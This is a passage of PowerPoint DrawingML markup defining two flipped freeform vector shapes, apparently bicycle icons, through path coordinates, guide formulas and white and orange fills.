                      <a:pt x="769" y="797"/>
                      <a:pt x="769" y="797"/>
                      <a:pt x="769" y="797"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="755" y="684"/>
                      <a:pt x="692" y="586"/>
                      <a:pt x="602" y="525"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="652" y="428"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="679" y="798"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="459" y="799"/>
                      <a:pt x="459" y="799"/>
                      <a:pt x="459" y="799"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="561" y="604"/>
                      <a:pt x="561" y="604"/>
                      <a:pt x="561" y="604"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="623" y="649"/>
                      <a:pt x="667" y="718"/>
                      <a:pt x="679" y="798"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="386" y="1142"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="221" y="1141"/>
                      <a:pt x="88" y="1008"/>
                      <a:pt x="88" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="88" y="680"/>
                      <a:pt x="221" y="547"/>
                      <a:pt x="386" y="546"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="420" y="547"/>
                      <a:pt x="452" y="553"/>
                      <a:pt x="483" y="563"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="347" y="824"/>
                      <a:pt x="347" y="824"/>
                      <a:pt x="347" y="824"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="340" y="837"/>
                      <a:pt x="340" y="854"/>
                      <a:pt x="348" y="867"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="356" y="880"/>
                      <a:pt x="371" y="888"/>
                      <a:pt x="386" y="888"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="386" y="888"/>
                      <a:pt x="386" y="888"/>
                      <a:pt x="386" y="888"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="680" y="886"/>
                      <a:pt x="680" y="886"/>
                      <a:pt x="680" y="886"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="659" y="1030"/>
                      <a:pt x="536" y="1141"/>
                      <a:pt x="386" y="1142"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="921" y="762"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="720" y="366"/>
                      <a:pt x="720" y="366"/>
                      <a:pt x="720" y="366"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1263" y="366"/>
                      <a:pt x="1263" y="366"/>
                      <a:pt x="1263" y="366"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="921" y="762"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="1512" y="1142"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1348" y="1141"/>
                      <a:pt x="1215" y="1008"/>
                      <a:pt x="1214" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1215" y="725"/>
                      <a:pt x="1284" y="623"/>
                      <a:pt x="1385" y="575"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1470" y="857"/>
                      <a:pt x="1470" y="857"/>
                      <a:pt x="1470" y="857"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1476" y="876"/>
                      <a:pt x="1493" y="888"/>
                      <a:pt x="1512" y="888"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1516" y="888"/>
                      <a:pt x="1521" y="888"/>
                      <a:pt x="1525" y="886"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1548" y="879"/>
                      <a:pt x="1561" y="855"/>
                      <a:pt x="1554" y="831"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1554" y="831"/>
                      <a:pt x="1554" y="831"/>
                      <a:pt x="1554" y="831"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1469" y="550"/>
                      <a:pt x="1469" y="550"/>
                      <a:pt x="1469" y="550"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1483" y="548"/>
                      <a:pt x="1497" y="547"/>
                      <a:pt x="1512" y="546"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1676" y="547"/>
                      <a:pt x="1809" y="680"/>
                      <a:pt x="1810" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1809" y="1008"/>
                      <a:pt x="1676" y="1141"/>
                      <a:pt x="1512" y="1142"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>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90" name="Freeform 589"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="6826516" y="6646631"/>
                <a:ext cx="461492" cy="299403"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1443 w 1898"/>
                  <a:gd name="T1" fmla="*/ 464 h 1230"/>
                  <a:gd name="T2" fmla="*/ 1359 w 1898"/>
                  <a:gd name="T3" fmla="*/ 81 h 1230"/>
                  <a:gd name="T4" fmla="*/ 1177 w 1898"/>
                  <a:gd name="T5" fmla="*/ 47 h 1230"/>
                  <a:gd name="T6" fmla="*/ 1062 w 1898"/>
                  <a:gd name="T7" fmla="*/ 17 h 1230"/>
                  <a:gd name="T8" fmla="*/ 1171 w 1898"/>
                  <a:gd name="T9" fmla="*/ 135 h 1230"/>
                  <a:gd name="T10" fmla="*/ 1280 w 1898"/>
                  <a:gd name="T11" fmla="*/ 135 h 1230"/>
                  <a:gd name="T12" fmla="*/ 675 w 1898"/>
                  <a:gd name="T13" fmla="*/ 278 h 1230"/>
                  <a:gd name="T14" fmla="*/ 655 w 1898"/>
                  <a:gd name="T15" fmla="*/ 200 h 1230"/>
                  <a:gd name="T16" fmla="*/ 717 w 1898"/>
                  <a:gd name="T17" fmla="*/ 135 h 1230"/>
                  <a:gd name="T18" fmla="*/ 652 w 1898"/>
                  <a:gd name="T19" fmla="*/ 70 h 1230"/>
                  <a:gd name="T20" fmla="*/ 445 w 1898"/>
                  <a:gd name="T21" fmla="*/ 71 h 1230"/>
                  <a:gd name="T22" fmla="*/ 446 w 1898"/>
                  <a:gd name="T23" fmla="*/ 215 h 1230"/>
                  <a:gd name="T24" fmla="*/ 454 w 1898"/>
                  <a:gd name="T25" fmla="*/ 216 h 1230"/>
                  <a:gd name="T26" fmla="*/ 458 w 1898"/>
                  <a:gd name="T27" fmla="*/ 216 h 1230"/>
                  <a:gd name="T28" fmla="*/ 603 w 1898"/>
                  <a:gd name="T29" fmla="*/ 331 h 1230"/>
                  <a:gd name="T30" fmla="*/ 386 w 1898"/>
                  <a:gd name="T31" fmla="*/ 458 h 1230"/>
                  <a:gd name="T32" fmla="*/ 386 w 1898"/>
                  <a:gd name="T33" fmla="*/ 1230 h 1230"/>
                  <a:gd name="T34" fmla="*/ 911 w 1898"/>
                  <a:gd name="T35" fmla="*/ 885 h 1230"/>
                  <a:gd name="T36" fmla="*/ 911 w 1898"/>
                  <a:gd name="T37" fmla="*/ 885 h 1230"/>
                  <a:gd name="T38" fmla="*/ 921 w 1898"/>
                  <a:gd name="T39" fmla="*/ 883 h 1230"/>
                  <a:gd name="T40" fmla="*/ 931 w 1898"/>
                  <a:gd name="T41" fmla="*/ 880 h 1230"/>
                  <a:gd name="T42" fmla="*/ 935 w 1898"/>
                  <a:gd name="T43" fmla="*/ 877 h 1230"/>
                  <a:gd name="T44" fmla="*/ 943 w 1898"/>
                  <a:gd name="T45" fmla="*/ 870 h 1230"/>
                  <a:gd name="T46" fmla="*/ 945 w 1898"/>
                  <a:gd name="T47" fmla="*/ 869 h 1230"/>
                  <a:gd name="T48" fmla="*/ 1341 w 1898"/>
                  <a:gd name="T49" fmla="*/ 411 h 1230"/>
                  <a:gd name="T50" fmla="*/ 1358 w 1898"/>
                  <a:gd name="T51" fmla="*/ 486 h 1230"/>
                  <a:gd name="T52" fmla="*/ 1126 w 1898"/>
                  <a:gd name="T53" fmla="*/ 844 h 1230"/>
                  <a:gd name="T54" fmla="*/ 1898 w 1898"/>
                  <a:gd name="T55" fmla="*/ 844 h 1230"/>
                  <a:gd name="T56" fmla="*/ 652 w 1898"/>
                  <a:gd name="T57" fmla="*/ 428 h 1230"/>
                  <a:gd name="T58" fmla="*/ 769 w 1898"/>
                  <a:gd name="T59" fmla="*/ 797 h 1230"/>
                  <a:gd name="T60" fmla="*/ 652 w 1898"/>
                  <a:gd name="T61" fmla="*/ 428 h 1230"/>
                  <a:gd name="T62" fmla="*/ 459 w 1898"/>
                  <a:gd name="T63" fmla="*/ 799 h 1230"/>
                  <a:gd name="T64" fmla="*/ 679 w 1898"/>
                  <a:gd name="T65" fmla="*/ 798 h 1230"/>
                  <a:gd name="T66" fmla="*/ 88 w 1898"/>
                  <a:gd name="T67" fmla="*/ 844 h 1230"/>
                  <a:gd name="T68" fmla="*/ 483 w 1898"/>
                  <a:gd name="T69" fmla="*/ 563 h 1230"/>
                  <a:gd name="T70" fmla="*/ 348 w 1898"/>
                  <a:gd name="T71" fmla="*/ 867 h 1230"/>
                  <a:gd name="T72" fmla="*/ 386 w 1898"/>
                  <a:gd name="T73" fmla="*/ 888 h 1230"/>
                  <a:gd name="T74" fmla="*/ 386 w 1898"/>
                  <a:gd name="T75" fmla="*/ 1142 h 1230"/>
                  <a:gd name="T76" fmla="*/ 720 w 1898"/>
                  <a:gd name="T77" fmla="*/ 366 h 1230"/>
                  <a:gd name="T78" fmla="*/ 921 w 1898"/>
                  <a:gd name="T79" fmla="*/ 762 h 1230"/>
                  <a:gd name="T80" fmla="*/ 1214 w 1898"/>
                  <a:gd name="T81" fmla="*/ 844 h 1230"/>
                  <a:gd name="T82" fmla="*/ 1470 w 1898"/>
                  <a:gd name="T83" fmla="*/ 857 h 1230"/>
                  <a:gd name="T84" fmla="*/ 1525 w 1898"/>
                  <a:gd name="T85" fmla="*/ 886 h 1230"/>
                  <a:gd name="T86" fmla="*/ 1554 w 1898"/>
                  <a:gd name="T87" fmla="*/ 831 h 1230"/>
                  <a:gd name="T88" fmla="*/ 1512 w 1898"/>
                  <a:gd name="T89" fmla="*/ 546 h 1230"/>
                  <a:gd name="T90" fmla="*/ 1512 w 1898"/>
                  <a:gd name="T91" fmla="*/ 11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8" h="1230">
                    <a:moveTo>
                      <a:pt x="1512" y="458"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1489" y="458"/>
                      <a:pt x="1466" y="460"/>
                      <a:pt x="1443" y="464"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1443" y="462"/>
                      <a:pt x="1443" y="462"/>
                      <a:pt x="1443" y="462"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1359" y="81"/>
                      <a:pt x="1359" y="81"/>
                      <a:pt x="1359" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1354" y="61"/>
                      <a:pt x="1336" y="47"/>
                      <a:pt x="1315" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1177" y="47"/>
                      <a:pt x="1177" y="47"/>
                      <a:pt x="1177" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1171" y="46"/>
                      <a:pt x="1147" y="41"/>
                      <a:pt x="1124" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1107" y="0"/>
                      <a:pt x="1079" y="0"/>
                      <a:pt x="1062" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1045" y="35"/>
                      <a:pt x="1045" y="63"/>
                      <a:pt x="1062" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1112" y="130"/>
                      <a:pt x="1165" y="134"/>
                      <a:pt x="1171" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1174" y="135"/>
                      <a:pt x="1174" y="135"/>
                      <a:pt x="1174" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1280" y="135"/>
                      <a:pt x="1280" y="135"/>
                      <a:pt x="1280" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1312" y="278"/>
                      <a:pt x="1312" y="278"/>
                      <a:pt x="1312" y="278"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="675" y="278"/>
                      <a:pt x="675" y="278"/>
                      <a:pt x="675" y="278"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="636" y="202"/>
                      <a:pt x="636" y="202"/>
                      <a:pt x="636" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="655" y="200"/>
                      <a:pt x="655" y="200"/>
                      <a:pt x="655" y="200"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="656" y="200"/>
                      <a:pt x="657" y="200"/>
                      <a:pt x="658" y="199"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="691" y="196"/>
                      <a:pt x="717" y="169"/>
                      <a:pt x="717" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="717" y="102"/>
                      <a:pt x="692" y="75"/>
                      <a:pt x="660" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="658" y="70"/>
                      <a:pt x="655" y="70"/>
                      <a:pt x="652" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="454" y="70"/>
                      <a:pt x="454" y="70"/>
                      <a:pt x="454" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="451" y="70"/>
                      <a:pt x="448" y="70"/>
                      <a:pt x="445" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="409" y="75"/>
                      <a:pt x="381" y="106"/>
                      <a:pt x="381" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="381" y="181"/>
                      <a:pt x="409" y="211"/>
                      <a:pt x="446" y="215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="448" y="216"/>
                      <a:pt x="451" y="216"/>
                      <a:pt x="453" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="454" y="216"/>
                      <a:pt x="454" y="216"/>
                      <a:pt x="454" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="454" y="216"/>
                      <a:pt x="454" y="216"/>
                      <a:pt x="454" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="455" y="216"/>
                      <a:pt x="457" y="216"/>
                      <a:pt x="458" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="541" y="209"/>
                      <a:pt x="541" y="209"/>
                      <a:pt x="541" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="603" y="331"/>
                      <a:pt x="603" y="331"/>
                      <a:pt x="603" y="331"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="524" y="484"/>
                      <a:pt x="524" y="484"/>
                      <a:pt x="524" y="484"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="481" y="467"/>
                      <a:pt x="434" y="458"/>
                      <a:pt x="386" y="458"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="458"/>
                      <a:pt x="0" y="631"/>
                      <a:pt x="0" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="1057"/>
                      <a:pt x="173" y="1230"/>
                      <a:pt x="386" y="1230"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="585" y="1230"/>
                      <a:pt x="749" y="1079"/>
                      <a:pt x="769" y="885"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                      <a:pt x="911" y="885"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="912" y="885"/>
                      <a:pt x="912" y="885"/>
                      <a:pt x="912" y="885"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="915" y="884"/>
                      <a:pt x="918" y="884"/>
                      <a:pt x="921" y="883"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="922" y="883"/>
                      <a:pt x="923" y="883"/>
                      <a:pt x="924" y="883"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="926" y="882"/>
                      <a:pt x="928" y="881"/>
                      <a:pt x="931" y="880"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="931" y="880"/>
                      <a:pt x="931" y="880"/>
                      <a:pt x="931" y="880"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="933" y="879"/>
                      <a:pt x="934" y="878"/>
                      <a:pt x="935" y="877"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="936" y="877"/>
                      <a:pt x="937" y="876"/>
                      <a:pt x="938" y="875"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="940" y="874"/>
                      <a:pt x="942" y="872"/>
                      <a:pt x="943" y="870"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="944" y="870"/>
                      <a:pt x="944" y="870"/>
                      <a:pt x="945" y="869"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="945" y="869"/>
                      <a:pt x="945" y="869"/>
                      <a:pt x="945" y="869"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="945" y="869"/>
                      <a:pt x="945" y="869"/>
                      <a:pt x="945" y="869"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1341" y="411"/>
                      <a:pt x="1341" y="411"/>
                      <a:pt x="1341" y="411"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1357" y="483"/>
                      <a:pt x="1357" y="483"/>
                      <a:pt x="1357" y="483"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1358" y="486"/>
                      <a:pt x="1358" y="486"/>
                      <a:pt x="1358" y="486"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1359" y="490"/>
                      <a:pt x="1359" y="490"/>
                      <a:pt x="1359" y="490"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1222" y="549"/>
                      <a:pt x="1126" y="685"/>
                      <a:pt x="1126" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1126" y="1057"/>
                      <a:pt x="1299" y="1230"/>
                      <a:pt x="1512" y="1230"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1725" y="1230"/>
                      <a:pt x="1898" y="1057"/>
                      <a:pt x="1898" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1898" y="631"/>
                      <a:pt x="1725" y="458"/>
                      <a:pt x="1512" y="458"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="652" y="428"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="840" y="797"/>
                      <a:pt x="840" y="797"/>
                      <a:pt x="840" y="797"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="769" y="797"/>
                      <a:pt x="769" y="797"/>
                      <a:pt x="769" y="797"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="755" y="684"/>
                      <a:pt x="692" y="586"/>
                      <a:pt x="602" y="525"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="652" y="428"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="679" y="798"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="459" y="799"/>
                      <a:pt x="459" y="799"/>
                      <a:pt x="459" y="799"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="561" y="604"/>
                      <a:pt x="561" y="604"/>
                      <a:pt x="561" y="604"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="623" y="649"/>
                      <a:pt x="667" y="718"/>
                      <a:pt x="679" y="798"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="386" y="1142"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="221" y="1141"/>
                      <a:pt x="88" y="1008"/>
                      <a:pt x="88" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="88" y="680"/>
                      <a:pt x="221" y="547"/>
                      <a:pt x="386" y="546"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="420" y="547"/>
                      <a:pt x="452" y="553"/>
                      <a:pt x="483" y="563"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="347" y="824"/>
                      <a:pt x="347" y="824"/>
                      <a:pt x="347" y="824"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="340" y="837"/>
                      <a:pt x="340" y="854"/>
                      <a:pt x="348" y="867"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="356" y="880"/>
                      <a:pt x="371" y="888"/>
                      <a:pt x="386" y="888"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="386" y="888"/>
                      <a:pt x="386" y="888"/>
                      <a:pt x="386" y="888"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="680" y="886"/>
                      <a:pt x="680" y="886"/>
                      <a:pt x="680" y="886"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="659" y="1030"/>
                      <a:pt x="536" y="1141"/>
                      <a:pt x="386" y="1142"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="921" y="762"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="720" y="366"/>
                      <a:pt x="720" y="366"/>
                      <a:pt x="720" y="366"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1263" y="366"/>
                      <a:pt x="1263" y="366"/>
                      <a:pt x="1263" y="366"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="921" y="762"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="1512" y="1142"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1348" y="1141"/>
                      <a:pt x="1215" y="1008"/>
                      <a:pt x="1214" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1215" y="725"/>
                      <a:pt x="1284" y="623"/>
                      <a:pt x="1385" y="575"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1470" y="857"/>
                      <a:pt x="1470" y="857"/>
                      <a:pt x="1470" y="857"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1476" y="876"/>
                      <a:pt x="1493" y="888"/>
                      <a:pt x="1512" y="888"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1516" y="888"/>
                      <a:pt x="1521" y="888"/>
                      <a:pt x="1525" y="886"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1548" y="879"/>
                      <a:pt x="1561" y="855"/>
                      <a:pt x="1554" y="831"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1554" y="831"/>
                      <a:pt x="1554" y="831"/>
                      <a:pt x="1554" y="831"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1469" y="550"/>
                      <a:pt x="1469" y="550"/>
                      <a:pt x="1469" y="550"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1483" y="548"/>
                      <a:pt x="1497" y="547"/>
                      <a:pt x="1512" y="546"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1676" y="547"/>
                      <a:pt x="1809" y="680"/>
                      <a:pt x="1810" y="844"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1809" y="1008"/>
                      <a:pt x="1676" y="1141"/>
                      <a:pt x="1512" y="1142"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FF8C00"/>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91" name="Freeform 590"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7346081" y="6646631"/>
                <a:ext cx="461492" cy="299403"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1443 w 1898"/>
                  <a:gd name="T1" fmla="*/ 464 h 1230"/>
                  <a:gd name="T2" fmla="*/ 1359 w 1898"/>
                  <a:gd name="T3" fmla="*/ 81 h 1230"/>
                  <a:gd name="T4" fmla="*/ 1177 w 1898"/>
                  <a:gd name="T5" fmla="*/ 47 h 1230"/>
                  <a:gd name="T6" fmla="*/ 1062 w 1898"/>
                  <a:gd name="T7" fmla="*/ 17 h 1230"/>
                  <a:gd name="T8" fmla="*/ 1171 w 1898"/>
                  <a:gd name="T9" fmla="*/ 135 h 1230"/>
                  <a:gd name="T10" fmla="*/ 1280 w 1898"/>
                  <a:gd name="T11" fmla="*/ 135 h 1230"/>
                  <a:gd name="T12" fmla="*/ 675 w 1898"/>
                  <a:gd name="T13" fmla="*/ 278 h 1230"/>
                  <a:gd name="T14" fmla="*/ 655 w 1898"/>
                  <a:gd name="T15" fmla="*/ 200 h 1230"/>
                  <a:gd name="T16" fmla="*/ 717 w 1898"/>
                  <a:gd name="T17" fmla="*/ 135 h 1230"/>
                  <a:gd name="T18" fmla="*/ 652 w 1898"/>
                  <a:gd name="T19" fmla="*/ 70 h 1230"/>
                  <a:gd name="T20" fmla="*/ 445 w 1898"/>
                  <a:gd name="T21" fmla="*/ 71 h 1230"/>
                  <a:gd name="T22" fmla="*/ 446 w 1898"/>
                  <a:gd name="T23" fmla="*/ 215 h 1230"/>
                  <a:gd name="T24" fmla="*/ 454 w 1898"/>
                  <a:gd name="T25" fmla="*/ 216 h 1230"/>
                  <a:gd name="T26" fmla="*/ 458 w 1898"/>
                  <a:gd name="T27" fmla="*/ 216 h 1230"/>
                  <a:gd name="T28" fmla="*/ 603 w 1898"/>
                  <a:gd name="T29" fmla="*/ 331 h 1230"/>
                  <a:gd name="T30" fmla="*/ 386 w 1898"/>
                  <a:gd name="T31" fmla="*/ 458 h 1230"/>
                  <a:gd name="T32" fmla="*/ 386 w 1898"/>
                  <a:gd name="T33" fmla="*/ 1230 h 1230"/>
                  <a:gd name="T34" fmla="*/ 911 w 1898"/>
                  <a:gd name="T35" fmla="*/ 885 h 1230"/>
                  <a:gd name="T36" fmla="*/ 911 w 1898"/>
                  <a:gd name="T37" fmla="*/ 885 h 1230"/>
                  <a:gd name="T38" fmla="*/ 921 w 1898"/>
                  <a:gd name="T39" fmla="*/ 883 h 1230"/>
                  <a:gd name="T40" fmla="*/ 931 w 1898"/>
                  <a:gd name="T41" fmla="*/ 880 h 1230"/>
                  <a:gd name="T42" fmla="*/ 935 w 1898"/>
                  <a:gd name="T43" fmla="*/ 877 h 1230"/>
                  <a:gd name="T44" fmla="*/ 943 w 1898"/>
                  <a:gd name="T45" fmla="*/ 870 h 1230"/>
                  <a:gd name="T46" fmla="*/ 945 w 1898"/>
                  <a:gd name="T47" fmla="*/ 869 h 1230"/>
                  <a:gd name="T48" fmla="*/ 1341 w 1898"/>
                  <a:gd name="T49" fmla="*/ 411 h 1230"/>
                  <a:gd name="T50" fmla="*/ 1358 w 1898"/>
                  <a:gd name="T51" fmla="*/ 486 h 1230"/>
                  <a:gd name="T52" fmla="*/ 1126 w 1898"/>
                  <a:gd name="T53" fmla="*/ 844 h 1230"/>
                  <a:gd name="T54" fmla="*/ 1898 w 1898"/>
                  <a:gd name="T55" fmla="*/ 844 h 1230"/>
                  <a:gd name="T56" fmla="*/ 652 w 1898"/>
                  <a:gd name="T57" fmla="*/ 428 h 1230"/>
                  <a:gd name="T58" fmla="*/ 769 w 1898"/>
